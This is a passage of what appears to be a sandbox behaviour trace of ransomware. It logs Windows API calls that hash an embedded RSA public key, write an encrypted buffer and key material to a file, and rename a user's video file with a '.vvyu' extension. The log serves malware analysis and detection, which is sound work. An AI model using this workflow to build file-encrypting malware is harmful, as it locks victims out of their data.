KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.859] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.859] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eab40) returned 1 [0197.860] CryptCreateHash (in: hProv=0x6eab40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0197.860] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.860] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0197.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0197.861] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0197.861] GetLastError () returned 0x0 [0197.861] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0197.861] CryptReleaseContext (hProv=0x6eab40, dwFlags=0x0) returned 1 [0197.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0197.861] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0197.861] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0197.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.861] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0197.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x94f0) returned 0x2d4f778 [0197.862] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0197.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0197.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0197.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d478 [0197.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a450 [0197.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d4c0 [0197.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a468 [0197.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a498 [0197.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4f8 [0197.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4b0 [0197.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0197.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0197.863] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0197.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0197.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a498 | out: hHeap=0x6a0000) returned 1 [0197.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4b0 | out: hHeap=0x6a0000) returned 1 [0197.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4f8 | out: hHeap=0x6a0000) returned 1 [0197.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0197.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4f8 [0197.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0197.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4b0 [0197.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0197.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a498 [0197.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0197.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0197.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0197.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0197.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0197.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0197.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0197.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4b0 | out: hHeap=0x6a0000) returned 1 [0197.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a498 | out: hHeap=0x6a0000) returned 1 [0197.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4f8 | out: hHeap=0x6a0000) returned 1 [0197.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0197.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0197.866] GetCurrentThreadId () returned 0x264 [0197.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0197.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4c000 [0197.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0197.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0197.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0197.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0197.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.867] GetCurrentThreadId () returned 0x264 [0197.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0197.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0197.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0197.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0197.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4f8 [0197.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0197.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0197.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0197.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0197.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a498 [0197.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0197.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0197.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0197.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0197.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4b0 [0197.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0197.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0197.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0197.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a480 [0197.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0197.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a510 [0197.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0197.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4e0 [0197.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4c8 [0197.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a528 [0197.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4c8 | out: hHeap=0x6a0000) returned 1 [0197.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4c8 [0197.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4e0 | out: hHeap=0x6a0000) returned 1 [0197.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0197.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0197.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27748 [0197.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a498 | out: hHeap=0x6a0000) returned 1 [0197.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a498 [0197.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0197.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4f8 | out: hHeap=0x6a0000) returned 1 [0197.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0197.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a528 | out: hHeap=0x6a0000) returned 1 [0197.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0197.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0197.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bfe0 [0197.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a498 | out: hHeap=0x6a0000) returned 1 [0197.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0197.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0197.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0197.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0197.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0197.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0197.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0197.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0197.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0197.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4c8 | out: hHeap=0x6a0000) returned 1 [0197.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a510 | out: hHeap=0x6a0000) returned 1 [0197.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4b0 | out: hHeap=0x6a0000) returned 1 [0197.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a480 | out: hHeap=0x6a0000) returned 1 [0197.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0197.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0197.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0197.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a468 | out: hHeap=0x6a0000) returned 1 [0197.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d4c0 | out: hHeap=0x6a0000) returned 1 [0197.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0197.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0197.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0197.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0197.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0197.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0197.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0197.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0197.880] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4f778*, nNumberOfBytesToWrite=0x94e3, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4f778*, lpNumberOfBytesWritten=0x30ffb14*=0x94e3, lpOverlapped=0x0) returned 1 [0197.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4f778 | out: hHeap=0x6a0000) returned 1 [0197.881] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x94e8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.881] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0197.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0197.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0197.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0197.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0197.883] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0197.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.883] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.883] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0197.883] CloseHandle (hObject=0x52c) returned 1 [0197.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b3e8 [0197.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c0) returned 0x2d3a670 [0197.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0197.885] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\jQfTOUtHGP-pWFb0a.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\jqftouthgp-pwfb0a.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\jQfTOUtHGP-pWFb0a.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\jqftouthgp-pwfb0a.flv.vvyu")) returned 1 [0197.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0197.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.889] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x762d70 | out: hHeap=0x6a0000) returned 1 [0197.893] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa910bfb0, ftCreationTime.dwHighDateTime=0x1d89773, ftLastAccessTime.dwLowDateTime=0x834fbba0, ftLastAccessTime.dwHighDateTime=0x1d89778, ftLastWriteTime.dwLowDateTime=0x834fbba0, ftLastWriteTime.dwHighDateTime=0x1d89778, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LzHDQsiji02", cAlternateFileName="LZHDQS~1")) returned 1 [0197.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0197.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x38) returned 0x2cbf990 [0197.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b3e8 [0197.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b578 | out: hHeap=0x6a0000) returned 